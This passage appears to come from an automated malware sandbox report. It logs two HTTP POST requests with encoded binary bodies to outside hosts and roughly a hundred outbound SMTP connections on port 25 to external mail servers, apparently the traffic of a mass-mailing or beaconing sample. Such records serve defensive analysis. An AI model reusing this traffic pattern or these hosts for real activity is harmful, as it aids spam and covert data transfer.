                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.spanesi.comCache-Control: no-cacheData Raw: 4b 66 32 31 53 4a 62 35 48 39 4f 38 51 6e 43 5a 63 57 4d 6d 45 6a 6e 58 37 54 63 32 66 2b 2b 6f 4b 71 38 79 57 46 5a 6f 57 6a 5a 57 50 51 4b 49 37 38 31 32 41 4d 74 38 6f 6d 65 46 38 37 4c 58 53 31 44 52 35 70 71 34 4a 4d 65 58 6a 59 66 69 39 76 35 61 52 44 4b 55 58 54 37 46 31 53 6e 63 42 52 43 7a 6c 7a 74 33 6b 67 49 50 74 6b 38 72 74 67 2b 43 45 6e 4a 65 49 74 55 6d 54 76 69 74 64 79 37 4b 31 34 64 37 37 35 47 41 67 31 36 74 2f 64 76 4b 54 69 4a 37 44 73 59 39 38 2f 76 64 56 4a 38 6b 64 4c 4b 44 33 61 49 58 54 4d 35 48 31 48 73 75 53 67 7a 68 52 5a 70 78 2b 47 5a 69 51 4e 53 48 51 58 53 2f 56 79 46 31 55 64 72 5a 79 72 57 48 67 35 49 32 50 63 66 58 77 33 4b 4c 4e 54 49 7a 72 4e 4c 43 2f 78 58 47 7a 68 6d 4e 66 58 4e 36 68 54 6b 45 6a 6f 4d 68 65 32 49 35 65 5a 65 4e 2f 6f 57 37 4b 49 42 79 71 56 63 55 2f 69 4c 6c 6c 34 48 57 77 72 6d 70 59 78 5a 77 53 69 2b 44 7a 2b 39 55 42 30 50 67 66 42 63 4e 33 41 66 32 77 74 49 6a 66 46 65 6c 43 53 38 36 7a 66 45 41 69 57 75 54 30 48 41 74 6b 56 63 34 6f 37 46 51 6e 55 67 39 52 76 6c 6d 77 65 58 61 73 43 65 35 2b 54 6c 33 39 76 6a 49 75 33 37 79 39 67 75 6c 72 78 77 41 6d 55 48 51 44 73 6d 43 4e 42 45 6a 69 30 71 58 73 51 45 6e 39 6c 47 52 6f 2f 4a 55 34 4f 47 64 72 31 4f 59 4b 2f 74 69 76 38 76 62 4c 45 54 33 6b 67 71 45 72 6a 4e 54 74 67 6e 42 45 6e 6f 39 42 76 33 63 38 45 68 4b 2f 30 50 73 6e 7a 2b 57 76 44 4c 49 5a 4a 74 64 5a 66 6d 5a 33 52 48 52 58 41 4a 6b 45 36 75 62 49 7a 42 44 62 5a 77 6d 65 61 67 4b 6f 4a 2b 41 61 32 48 47 71 45 4c 41 41 38 66 69 72 4f 6b 68 6e 36 39 63 49 62 35 65 59 4d 6a 77 6d 71 4a 39 58 46 54 54 Data Ascii: Kf21SJb5H9O8QnCZcWMmEjnX7Tc2f++oKq8yWFZoWjZWPQKI7812AMt8omeF87LXS1DR5pq4JMeXjYfi9v5aRDKUXT7F1SncBRCzlzt3kgIPtk8rtg+CEnJeItUmTvitdy7K14d775GAg16t/dvKTiJ7DsY98/vdVJ8kdLKD3aIXTM5H1HsuSgzhRZpx+GZiQNSHQXS/VyF1UdrZyrWHg5I2PcfXw3KLNTIzrNLC/xXGzhmNfXN6hTkEjoMhe2I5eZeN/oW7KIByqVcU/iLll4HWwrmpYxZwSi+Dz+9UB0PgfBcN3Af2wtIjfFelCS86zfEAiWuT0HAtkVc4o7FQnUg9RvlmweXasCe5+Tl39vjIu37y9gulrxwAmUHQDsmCNBEji0qXsQEn9lGRo/JU4OGdr1OYK/tiv8vbLET3kgqErjNTtgnBEno9Bv3c8EhK/0Psnz+WvDLIZJtdZfmZ3RHRXAJkE6ubIzBDbZwmeagKoJ+Aa2HGqELAA8firOkhn69cIb5eYMjwmqJ9XFTT
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 43 4a 4d 75 55 72 54 70 6e 70 71 5a 32 5a 38 48 44 34 6b 79 4f 67 63 6a 6c 63 47 73 62 4d 43 31 4b 4c 72 78 62 51 51 77 41 54 76 34 77 75 33 4b 66 6c 73 7a 5a 79 74 55 37 6a 47 58 6c 68 43 74 41 53 43 65 38 68 50 6d 6c 31 75 62 55 61 34 44 43 42 43 41 35 6e 2f 45 37 52 4c 6b 6d 2b 64 62 4f 36 30 50 4f 44 70 4e 33 41 46 65 78 4a 57 74 6f 39 43 42 58 77 79 74 64 49 47 57 31 57 70 4e 72 43 77 37 4a 43 7a 44 6d 4c 51 78 30 35 4b 34 66 66 38 67 52 79 6d 73 68 36 2b 2b 48 50 72 48 78 64 4a 6e 41 31 41 34 36 30 43 6a 50 4f 67 79 4e 56 6a 79 36 63 63 68 44 6d 62 65 76 78 43 52 79 46 51 6c 66 6b 78 4d 38 34 64 4d 77 48 37 35 57 6d 58 65 53 4a 63 50 75 6e 73 6a 68 6e 4e 7a 37 70 6d 6d 38 61 4c 6b 65 6c 67 58 31 77 47 5a 34 77 30 65 43 52 5a 66 4e 2b 53 51 36 57 78 6c 4e 62 42 38 4b 33 76 48 46 62 78 66 34 77 44 53 7a 59 63 54 32 6a 2b 75 78 7a 37 59 31 61 6b 37 58 34 33 6e 32 33 42 56 56 55 53 58 66 6a 65 49 79 70 30 45 56 56 6b 72 6b 34 68 49 79 71 74 4a 49 45 6e 74 31 50 41 42 75 62 4a 6c 61 33 79 56 68 6d 4f 55 64 47 34 44 36 43 4f 47 6f 6d 42 45 30 4a 79 4e 78 34 34 35 74 41 48 65 62 46 33 77 6a 76 2b 66 67 2b 48 58 73 44 45 53 56 48 73 78 72 38 45 2f 42 61 58 34 4d 49 4e 2b 59 4f 76 41 68 7a 55 77 73 68 4a 62 68 61 7a 58 64 6f 75 4d 4e 68 2f 50 47 71 4f 6d 31 4a 57 4a 43 72 77 55 71 78 66 44 61 4f 51 56 64 36 47 6f 67 66 77 43 30 71 73 53 41 42 5a 2f 61 37 4f 63 45 30 36 7a 61 43 4e 59 52 74 2f 43 55 79 66 46 49 6e 37 58 45 6a 4b 76 62 65 58 4f 52 2f 71 73 48 2b 30 57 73 6c 41 44 46 77 71 38 30 55 6c 32 47 6f 49 53 36 46 38 48 44 4f 2b 73 4e 52 57 61 62 62 53 74 53 45 61 70 56 52 6d 77 62 34 34 7a 52 50 67 69 77 58 51 46 42 48 61 5a 30 38 4a 34 73 39 2f 44 6c 35 34 39 4e 73 2f 42 6d 69 6b 36 45 4f 70 45 7a 34 36 46 34 4f 75 45 Data Ascii: CJMuUrTpnpqZ2Z8HD4kyOgcjlcGsbMC1KLrxbQQwATv4wu3KflszZytU7jGXlhCtASCe8hPml1ubUa4DCBCA5n/E7RLkm+dbO60PODpN3AFexJWto9CBXwytdIGW1WpNrCw7JCzDmLQx05K4ff8gRymsh6++HPrHxdJnA1A460CjPOgyNVjy6cchDmbevxCRyFQlfkxM84dMwH75WmXeSJcPunsjhnNz7pmm8aLkelgX1wGZ4w0eCRZfN+SQ6WxlNbB8K3vHFbxf4wDSzYcT2j+uxz7Y1ak7X43n23BVVUSXfjeIyp0EVVkrk4hIyqtJIEnt1PABubJla3yVhmOUdG4D6COGomBE0JyNx445tAHebF3wjv+fg+HXsDESVHsxr8E/BaX4MIN+YOvAhzUwshJbhazXdouMNh/PGqOm1JWJCrwUqxfDaOQVd6GogfwC0qsSABZ/a7OcE06zaCNYRt/CUyfFIn7XEjKvbeXOR/qsH+0WslADFwq80Ul2GoIS6F8HDO+sNRWabbStSEapVRmwb44zRPgiwXQFBHaZ08J4s9/Dl549Ns/Bmik6EOpEz46F4OuE
                  Source: unknownNetwork traffic detected: IP country count 21
                  Source: global trafficTCP traffic: 192.168.2.4:56253 -> 219.94.128.87:25
                  Source: global trafficTCP traffic: 192.168.2.4:49803 -> 66.226.70.66:25
                  Source: global trafficTCP traffic: 192.168.2.4:50007 -> 66.163.170.48:25
                  Source: global trafficTCP traffic: 192.168.2.4:50051 -> 87.248.97.36:25
                  Source: global trafficTCP traffic: 192.168.2.4:50062 -> 34.193.69.252:25
                  Source: global trafficTCP traffic: 192.168.2.4:50063 -> 107.180.58.31:25
                  Source: global trafficTCP traffic: 192.168.2.4:50064 -> 15.197.142.173:25
                  Source: global trafficTCP traffic: 192.168.2.4:50065 -> 31.15.12.103:25
                  Source: global trafficTCP traffic: 192.168.2.4:50066 -> 104.21.30.14:25
                  Source: global trafficTCP traffic: 192.168.2.4:50067 -> 199.59.243.220:25
                  Source: global trafficTCP traffic: 192.168.2.4:50068 -> 188.114.97.7:25
                  Source: global trafficTCP traffic: 192.168.2.4:50069 -> 23.239.201.14:25
                  Source: global trafficTCP traffic: 192.168.2.4:50070 -> 213.186.33.16:25
                  Source: global trafficTCP traffic: 192.168.2.4:50071 -> 133.125.38.187:25
                  Source: global trafficTCP traffic: 192.168.2.4:50073 -> 208.91.197.46:25
                  Source: global trafficTCP traffic: 192.168.2.4:50075 -> 136.243.147.81:25
                  Source: global trafficTCP traffic: 192.168.2.4:50086 -> 217.69.139.150:25
                  Source: global trafficTCP traffic: 192.168.2.4:50090 -> 203.137.75.45:25
                  Source: global trafficTCP traffic: 192.168.2.4:50091 -> 142.250.157.27:25
                  Source: global trafficTCP traffic: 192.168.2.4:50092 -> 79.96.32.254:25
                  Source: global trafficTCP traffic: 192.168.2.4:50093 -> 37.59.243.164:25
                  Source: global trafficTCP traffic: 192.168.2.4:50098 -> 91.220.211.163:25
                  Source: global trafficTCP traffic: 192.168.2.4:50104 -> 65.52.128.33:25
                  Source: global trafficTCP traffic: 192.168.2.4:50105 -> 94.100.180.31:25
                  Source: global trafficTCP traffic: 192.168.2.4:50109 -> 153.126.211.112:25
                  Source: global trafficTCP traffic: 192.168.2.4:50119 -> 88.86.118.82:25
                  Source: global trafficTCP traffic: 192.168.2.4:50120 -> 205.178.189.131:25
                  Source: global trafficTCP traffic: 192.168.2.4:50121 -> 94.130.164.242:25
                  Source: global trafficTCP traffic: 192.168.2.4:50122 -> 5.39.75.157:25
                  Source: global trafficTCP traffic: 192.168.2.4:50125 -> 13.248.169.48:25
                  Source: global trafficTCP traffic: 192.168.2.4:50127 -> 102.134.49.77:25
                  Source: global trafficTCP traffic: 192.168.2.4:50134 -> 108.170.12.50:25
                  Source: global trafficTCP traffic: 192.168.2.4:50135 -> 27.0.174.59:25
                  Source: global trafficTCP traffic: 192.168.2.4:50137 -> 198.209.253.30:25
                  Source: global trafficTCP traffic: 192.168.2.4:50139 -> 142.250.27.26:25
                  Source: global trafficTCP traffic: 192.168.2.4:50140 -> 103.168.172.216:25
                  Source: global trafficTCP traffic: 192.168.2.4:50142 -> 203.0.113.0:25
                  Source: global trafficTCP traffic: 192.168.2.4:50161 -> 104.21.235.31:25
                  Source: global trafficTCP traffic: 192.168.2.4:50162 -> 103.168.172.220:25
                  Source: global trafficTCP traffic: 192.168.2.4:50165 -> 46.4.56.54:25
                  Source: global trafficTCP traffic: 192.168.2.4:50216 -> 198.1.81.28:25
                  Source: global trafficTCP traffic: 192.168.2.4:50228 -> 211.13.196.162:25
                  Source: global trafficTCP traffic: 192.168.2.4:50241 -> 153.120.34.73:25
                  Source: global trafficTCP traffic: 192.168.2.4:50628 -> 46.30.60.158:25
                  Source: global trafficTCP traffic: 192.168.2.4:50824 -> 188.114.96.7:25
                  Source: global trafficTCP traffic: 192.168.2.4:51094 -> 63.251.106.25:25
                  Source: global trafficTCP traffic: 192.168.2.4:51102 -> 86.105.245.69:25
                  Source: global trafficTCP traffic: 192.168.2.4:51247 -> 159.89.244.183:25
                  Source: global trafficTCP traffic: 192.168.2.4:51925 -> 151.101.2.132:25
                  Source: global trafficTCP traffic: 192.168.2.4:52062 -> 216.69.141.67:25
                  Source: global trafficTCP traffic: 192.168.2.4:55639 -> 195.96.252.188:25
                  Source: global trafficTCP traffic: 192.168.2.4:55640 -> 104.20.55.214:25
                  Source: global trafficTCP traffic: 192.168.2.4:55641 -> 165.160.15.20:25
                  Source: global trafficTCP traffic: 192.168.2.4:55642 -> 104.21.29.72:25
                  Source: global trafficTCP traffic: 192.168.2.4:56123 -> 221.132.33.88:25
                  Source: global trafficTCP traffic: 192.168.2.4:56229 -> 164.92.82.47:25
                  Source: global trafficTCP traffic: 192.168.2.4:56239 -> 204.15.134.44:25
                  Source: global trafficTCP traffic: 192.168.2.4:56249 -> 178.249.70.75:25
                  Source: global trafficTCP traffic: 192.168.2.4:56250 -> 198.49.23.144:25
                  Source: global trafficTCP traffic: 192.168.2.4:56621 -> 87.230.93.218:25
                  Source: global trafficTCP traffic: 192.168.2.4:56648 -> 92.42.191.40:25
                  Source: global trafficTCP traffic: 192.168.2.4:56705 -> 194.76.27.77:25
                  Source: global trafficTCP traffic: 192.168.2.4:57289 -> 193.70.68.254:25
                  Source: global trafficTCP traffic: 192.168.2.4:57503 -> 104.21.10.34:25
                  Source: global trafficTCP traffic: 192.168.2.4:57518 -> 128.204.134.138:25
                  Source: global trafficTCP traffic: 192.168.2.4:57607 -> 183.90.232.24:25
                  Source: global trafficTCP traffic: 192.168.2.4:57704 -> 62.122.170.171:25
                  Source: global trafficTCP traffic: 192.168.2.4:57948 -> 54.212.145.129:25
                  Source: global trafficTCP traffic: 192.168.2.4:58002 -> 212.44.102.57:25
                  Source: global trafficTCP traffic: 192.168.2.4:58015 -> 154.213.117.166:25
                  Source: global trafficTCP traffic: 192.168.2.4:59005 -> 49.212.243.77:25
                  Source: global trafficTCP traffic: 192.168.2.4:59401 -> 35.172.94.1:25
                  Source: global trafficTCP traffic: 192.168.2.4:60150 -> 185.129.138.60:25
                  Source: global trafficTCP traffic: 192.168.2.4:60759 -> 75.2.70.75:25
                  Source: global trafficTCP traffic: 192.168.2.4:60809 -> 162.241.233.114:25
                  Source: global trafficTCP traffic: 192.168.2.4:60826 -> 202.94.166.30:25
                  Source: global trafficTCP traffic: 192.168.2.4:61372 -> 79.96.161.192:25
                  Source: global trafficTCP traffic: 192.168.2.4:62082 -> 199.59.243.224:25
                  Source: global trafficTCP traffic: 192.168.2.4:62084 -> 3.94.41.167:25
                  Source: global trafficTCP traffic: 192.168.2.4:62098 -> 216.239.32.21:25
                  Source: global trafficTCP traffic: 192.168.2.4:62107 -> 185.22.232.175:25
                  Source: global trafficTCP traffic: 192.168.2.4:1560 -> 208.80.123.104:25
                  Source: global trafficTCP traffic: 192.168.2.4:2773 -> 93.187.206.66:25
                  Source: global trafficTCP traffic: 192.168.2.4:3435 -> 45.142.176.225:25
                  Source: global trafficTCP traffic: 192.168.2.4:3452 -> 202.172.28.187:25
                  Source: global trafficTCP traffic: 192.168.2.4:3472 -> 202.172.28.89:25
                  Source: global trafficTCP traffic: 192.168.2.4:5425 -> 141.193.213.20:25
                  Source: global trafficTCP traffic: 192.168.2.4:5685 -> 157.7.107.88:25
                  Source: global trafficTCP traffic: 192.168.2.4:7214 -> 46.8.8.200:25
                  Source: global trafficTCP traffic: 192.168.2.4:7584 -> 216.177.137.32:25
                  Source: global trafficTCP traffic: 192.168.2.4:8153 -> 198.185.159.144:25
                  Source: global trafficTCP traffic: 192.168.2.4:10071 -> 195.128.140.29:25
                  Source: global trafficTCP traffic: 192.168.2.4:12204 -> 59.106.13.169:25
                  Source: global trafficTCP traffic: 192.168.2.4:13606 -> 211.13.204.3:25
                  Source: global trafficTCP traffic: 192.168.2.4:13926 -> 217.74.161.133:25
                  Source: global trafficTCP traffic: 192.168.2.4:17233 -> 35.154.163.204:25
                  Source: global trafficTCP traffic: 192.168.2.4:17254 -> 46.19.218.80:25
                  Source: global trafficTCP traffic: 192.168.2.4:17303 -> 219.94.129.97:25
                  Source: global trafficTCP traffic: 192.168.2.4:19787 -> 3.64.163.50:25
                  Source: global trafficTCP traffic: 192.168.2.4:19896 -> 35.230.155.43:25
                  Source: global trafficTCP traffic: 192.168.2.4:20918 -> 217.19.254.22:25
                  Source: global trafficTCP traffic: 192.168.2.4:21160 -> 76.74.184.61:25
                  Source: global trafficTCP traffic: 192.168.2.4:21342 -> 198.185.159.145:25
                  Source: global trafficTCP traffic: 192.168.2.4:21369 -> 104.21.79.166:25
                  Source: global trafficTCP traffic: 192.168.2.4:21374 -> 23.227.38.32:25
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62435 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2062 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3399 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16525 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52633 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4231 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59253 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64628 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15682 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13018 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5568 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13488 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6436 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16549 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14332 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4255 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63303 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61592 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62411 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1194 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2086 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62460 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60229 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15657 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16550 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2037 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17417 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 11283 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 21913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62459 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16501 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57047 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14381 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4280 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8617 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63327 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9943 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61543 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59277 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3351 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15633 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12151 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5520 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13464 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7304 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4279 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5593 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4206 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 20600 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61146 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13440 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19611 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5147 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65521 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 21937 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57023 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 22398 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12102 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3326 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16574 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51209
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6461 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 21085 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16882
